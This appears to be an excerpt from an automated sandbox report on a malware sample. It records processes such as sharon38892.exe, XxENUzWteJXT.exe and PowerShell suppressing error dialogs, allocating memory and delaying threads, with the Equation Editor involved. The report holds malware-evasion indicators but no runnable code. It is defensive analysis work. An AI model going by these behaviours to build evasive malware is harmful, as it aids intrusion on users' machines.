Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory allocated: 250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory allocated: 2130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory allocated: 1F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory allocated: 5450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory allocated: 6450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory allocated: 6580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory allocated: 7580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory allocated: 160000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory allocated: 21A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory allocated: 4F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory allocated: 5520000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory allocated: 6520000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory allocated: 6650000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory allocated: 7650000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3027	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3330	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4588	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1568	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1775
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2035
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1157
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2019

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3032	Thread sleep time: -240000s >= -30000s	Jump to behavior
